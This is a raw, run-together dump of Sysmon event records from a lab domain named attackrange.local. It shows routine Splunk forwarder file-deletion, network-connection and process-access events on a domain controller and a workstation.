AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC4D7D89878507D73AB4DA6BBCF30B31,SHA256=7D21EF945FB35E3470A2B425A56C92EE41B9A33920029710374361E0DA6664D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245958Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:08.318{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F689DF29E2504ADF524872DF76060D78,SHA256=29A8C24F9512C9C7A40E029AD191828A848B89383A6210E1B09D14FA18B042E0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000245957Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:06.672{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64789-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x80000000000000001061274Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:09.909{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10B7AE7015691377273B219B1F44C71F,SHA256=4F690292416E407EBDA4573418EB866AD1D88F32EAB9C002180B7DC89F6F970D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245959Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:09.380{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A86CB82AA9A6EE5931531DACC0788E89,SHA256=F46428E7920BF79AB691801EC50610B9AB8DC205D2F5FFA41330E3C14D40F0BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245960Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:10.396{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7ADF5D6B11F3FD9D4D06441DAEB64A37,SHA256=3472DD1720232C69E55745F7A88108706A31D3CBF73A91C883E0C4E01AB90538,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061276Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:11.268{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D2BB3503C7D17B0969B21356DAB3430D,SHA256=323E036F3D618ADD8B9D26575A4B6EB7AC4CCD095BA2121A0E3E4FB62DC9A8DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061275Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:11.268{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EDBD939EF7C0915202BBB28A854FC957,SHA256=DD8269016258FB1F992B2F9F1D44EE87528685BC061EDD5826B9FBEBDB8022B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245961Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:11.411{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=86F34FAC844DEBD7B8A72F31F5EB46D5,SHA256=6DBDC520546EA13F2B4A17F2F7DC5049CDA811AC57B50DF26B030617E4BE3288,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001061278Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:09.951{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54819-false10.0.1.12-8000- 23542300x80000000000000001061277Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:12.628{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43C8E70AA883D8F8455AA8B5F55604EC,SHA256=F90BE2BA4CD3496A074FFA9DD8834363475E34D0F19711A7C5308AADBFB7CA22,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245962Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:12.411{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2130865B6714816473DCECF73B7A9790,SHA256=718147EB6DDBCE01A3CD2FC9D28FE180A63C27B6830AEBE50542DEDFBA94D3EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061280Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:13.987{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=929436C9022AE1CD1DBC39426986B843,SHA256=97551BF7A600D3718887BF886B5433945E5D97A73443A6BC092078D2AF7B4C71,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001061279Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:13.534{7F8C56E7-4E3C-6063-0D00-00000000AF01}8924808C:\Windows\system32\svchost.exe{7F8C56E7-4E65-6063-8300-00000000AF01}4420C:\Windows\System32\rdpclip.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x8000000000000000245965Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:13.458{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F584015CB5FB77FB5C88DC39A3D8BECA,SHA256=4228DB32489C56745FDCA966A704824452D16C26EE67EB789162917EEBD93EE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245964Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:13.380{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=467C502D604B8F7A19F43CC360C15668,SHA256=CB289DD6A739CC38EA1B7251031D043967C52C5122D983CB5073CA543F532068,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245963Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:13.380{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=40A60DC5C6483C575151B001B645301C,SHA256=D4DEE2281CCC248A9B6A9D009376AD686AF2D30FF7C8745F3A2740C0FEDB1EAB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245967Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:14.458{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E40692CB782B77B9E25377CA8283A7B,SHA256=D9A33E676D792082EB0BB1B6F1D2BD7A303D48F5DAD838C8FA309B7A75804A26,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000245966Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:12.656{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64790-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x80000000000000001061283Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:15.347{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1D081B1658CD4D255FB2346CCF772B3,SHA256=EDDDCB76CFCC1940F7FF3DDE0F2A597FBC899CAEE8CB04750E5732227BD9A5C6,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001061282Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:11.939{7F8C56E7-4E39-6063-0100-00000000AF01}4SystemNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.255-138netbios-dgmfalse10.0.1.14win-dc-877.attackrange.local138netbios-dgm 354300x80000000000000001061281Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:11.939{7F8C56E7-4E39-6063-0100-00000000AF01}4SystemNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-877.attackrange.local138netbios-dgmfalse10.0.1.255-138netbios-dgm 23542300x8000000000000000245968Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:15.521{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=440B2943EFA41B2B116E23CAA8DECB3C,SHA256=DEE18EA98A881BEC5BFAED9465133B80840DD2720002584197FABF9E08B97336,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245969Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:16.521{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6221A5D0BBBC892C3A88F1EB9100483,SHA256=9320A7491671495FCC60C97DE34B46222B5A9968D0CA826789296355F5EFF1E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061284Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:17.347{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FD26CA4BE020A3ACC354459E656F6C81,SHA256=DC25F98671B615DB4BC5C5F8324A80E42E602ADB75090EF9EAD9224B0F2BB78E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245970Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:17.521{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8DA41A820AB356A84E1DE35FAFAC1AA,SHA256=B18D60AE00526C98A50633EAC8CE0AE4AE850AC9D6B91E0A4DF904D969C34066,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001061285Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:15.920{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54820-false10.0.1.12-8000- 23542300x8000000000000000245971Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:18.553{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=34B320D2892303DA7E7F3C31E9F2EE75,SHA256=08C7A20E913F235A93D2F3297E48D4804BECC02574E8CC2049FAA6E4BF6575B4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001061294Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:19.738{7F8C56E7-4E4D-6063-3B00-00000000AF01}28842140C:\Windows\system32\conhost.exe{7F8C56E7-521B-6063-2701-00000000AF01}5572C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061293Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:19.738{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061292Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:19.738{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061291Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:19.738{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061290Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:19.738{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061289Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:19.738{7F8C56E7-4E3A-6063-0500-00000000AF01}4121572C:\Windows\system32\csrss.exe{7F8C56E7-521B-6063-2701-00000000AF01}5572C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001061288Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:19.738{7F8C56E7-4E4C-6063-3300-00000000AF01}23643588C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7F8C56E7-521B-6063-2701-00000000AF01}5572C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001061287Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:19.739{7F8C56E7-521B-6063-2701-00000000AF01}5572C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7F8C56E7-4E3B-6063-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001061286Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:19.066{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E5FFA54BC65BA5F0919B327E9D81315,SHA256=5A2EAEEDE522809215C733179743C72C709FEC408EFCE1E0AC21597C662D195F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245974Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:19.581{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A1DFEF7F8FDE87FC4D74CDE0F5F02EF,SHA256=B82E8186F40B75B1C905ED7DC26787B88B45F9D663BA54E91211070A5B6BF6C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245973Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:19.290{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=69F96CBE9CB8EDB18FFB6D831CB01216,SHA256=5FAC1628736F5E84F23D686B099398902772FF8162B891071DC37795CA2A32A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245972Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:19.290{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=467C502D604B8F7A19F43CC360C15668,SHA256=CB289DD6A739CC38EA1B7251031D043967C52C5122D983CB5073CA543F532068,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001061306Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:17.858{7F8C56E7-4E3B-6063-0B00-00000000AF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-877.attackrange.local54821-true0:0:0:0:0:0:0:1win-dc-877.attackrange.local389ldap 354300x80000000000000001061305Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:17.858{7F8C56E7-4E4C-6063-2F00-00000000AF01}988C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-877.attackrange.local54821-true0:0:0:0:0:0:0:1win-dc-877.attackrange.local389ldap 10341000x80000000000000001061304Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:20.550{7F8C56E7-521C-6063-2801-00000000AF01}42525800C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000001061303Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:20.425{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FCEDCD89A13105A577608AF232A49C64,SHA256=3FC1688075AC8096575249D018B1CB17936B6CE3EC011820EA908005DF7B22FC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001061302Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:20.425{7F8C56E7-4E4D-6063-3B00-00000000AF01}28842140C:\Windows\system32\conhost.exe{7F8C56E7-521C-6063-2801-00000000AF01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061301Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 